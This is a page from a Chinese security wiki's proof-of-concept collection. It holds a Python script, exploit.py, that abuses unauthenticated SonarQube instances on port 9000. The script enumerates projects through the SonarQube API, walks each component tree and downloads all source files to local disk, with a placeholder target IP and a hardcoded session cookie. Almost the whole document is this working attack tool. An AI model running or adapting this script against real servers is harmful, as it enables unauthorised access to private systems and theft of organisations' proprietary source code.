menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Some-PoC-oR-ExP-master chevron_right Sonarqube chevron_right exploit.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    exploit.py
    5.4 KB / 2021-07-04 19:32:24
        #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # User      : CF_HB
    # explain   : Sonarqube 9000端口,扫描引擎未授权访问的下载源码利用工具
    # Datetime  : 2021/3/14 23:25
    
    import requests
    import json
    import re
    import os
    import threading
    import queue
    from urllib.parse import urlparse
    #
    # Sonarqube 9000端口,扫描引擎未授权访问的下载源码利用工具
    #
    class Scanner(object):
        def __init__(self):
            self.url = ''
            self.project_key = ''
            self.project_name = ''  # IP+Project Name
            self.thread_count = 1
            self.languages = 'java'  # 搜索什么语言的源码,默认java, 可选:xml, java, jsp, js,web,kotlin,py,php,css,scala
            self.file_count = 0
            self.fail_count = 0
            self.check_key = ""
            self.components_Tree = []
    
        # 获取项目信息
        def get_projects(self):
    
            url = 'http://netloc/path;param?query=arg#frag'
            parsed = urlparse(self.url)
            netloc = parsed.netloc
            ipaddr = netloc.split(":")[0]
    
            try:
                burp0_base_url = self.url+"/api/components/search_projects?ps=50&f=analysisDate%2CleakPeriodDate&s=analysisDate&asc=false&"
                if self.check_key == "":
                    condiction_filter = "filter=languages%20%3D%20" + self.languages
                else:
                    condiction_filter = "filter=languages%20%3D%20" + self.languages + "%20and%20query%20%3D%20%22{check_key}%22".format(check_key=self.check_key)
    
                burp0_url = burp0_base_url + condiction_filter
                burp0_cookies = {"JSESSIONID": "2CA6E657AB011B76E0D5C02ED74D868B"}
                burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Accept": "application/json",
                                 "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36",
                                 "Referer": self.url+"/projects?sort=-analysis_date",
                                 "Accept-Encoding": "gzip, deflate",
                                 "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
                print(burp0_url)
    
                rsp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False)
                text_jsons = json.loads(rsp.content)
                total = (text_jsons['paging']['total'])
                print("FOUND %s Projects. in %s " % (total, self.url))
    
                components = text_jsons['components']
                # print(components)
                for component in components:
                    name = (component['name'])
                    analysisDate = (component['analysisDate'])
                    key = component['key']
                    # print(key)
                    self.project_key = key
                    self.project_name = ipaddr + os.sep + name
                    self.download_component_tree(key)
            except Exception as e:
                print(e)
                return None, None
    
        # 获取项目代码树和文件树
        def download_component_tree(self, project_key):
            get_component_tree_url = self.url + "/api/measures/component_tree?ps=100&s=qualifier%2Cname&component=" + project_key + "&metricKeys=code_smells&strategy=children"
            # print(get_component_tree_url)
            components_rsp = requests.get(get_component_tree_url, verify=False).content
            # print(components_rsp)
            components_list = json.loads(components_rsp)['components']
            for component in components_list:
                component_key = component['key']
                component_path = component['path']
                if "." not in component_path:
                    dir_target = self.project_name + os.sep + component_path
                    if not os.path.exists(dir_target):
                        os.makedirs(dir_target)
    
                    self.download_component_tree(component_key)
                else:
                    try:
    
                        self.get_file_sources(component_key, component_path)
                        self.file_count += 1
                        print("downloading %s files success.." % str(self.file_count))
                    except:
                        self.fail_count +=1
                        print("downloading %s files fail.." % str(self.fail_count))
    
        # 根据文件的KEY,下载源码如:http://111.222.000.333:9000/api/sources/lines?key=de.fonpit:fonpit-business-layer:pom.xml&from=1&to=5002
        def get_file_sources(self, component_key, component_path):
            url = self.url + "/api/sources/lines?key=" + component_key + "&from=1&to=5002"
            print("downloading %s files " + str(self.file_count))
    
            rsp = requests.get(url, verify=False)
            sources_json = json.loads(rsp.content)
            sources_lists = sources_json['sources']
            dr = re.compile(r'<[^>]+>', re.S)
            import html
    
            with open(self.project_name + os.sep + os.sep + component_path, mode='a+') as wf:
                for line in sources_lists:
                    sources_line = line['code']
                    sources_cleanline = dr.sub('', sources_line)
                    sources_unescape_cleanline = html.unescape(sources_cleanline)
                    wf.write(sources_unescape_cleanline + "\n")
    
    
        def scan(self):
            for i in range(self.thread_count):
                t = threading.Thread(target=self.get_projects())
                t.start()
    
    
    if __name__ == '__main__':
        s = Scanner()
        s.check_key = ""  # 特定的项目
        s.url = "http://000.111.222.333:9000"   # 目标Sonarqube IP地址
        s.scan()
        print("Everything is Over, Have Fun~~~~")
    
    
    links
    file_download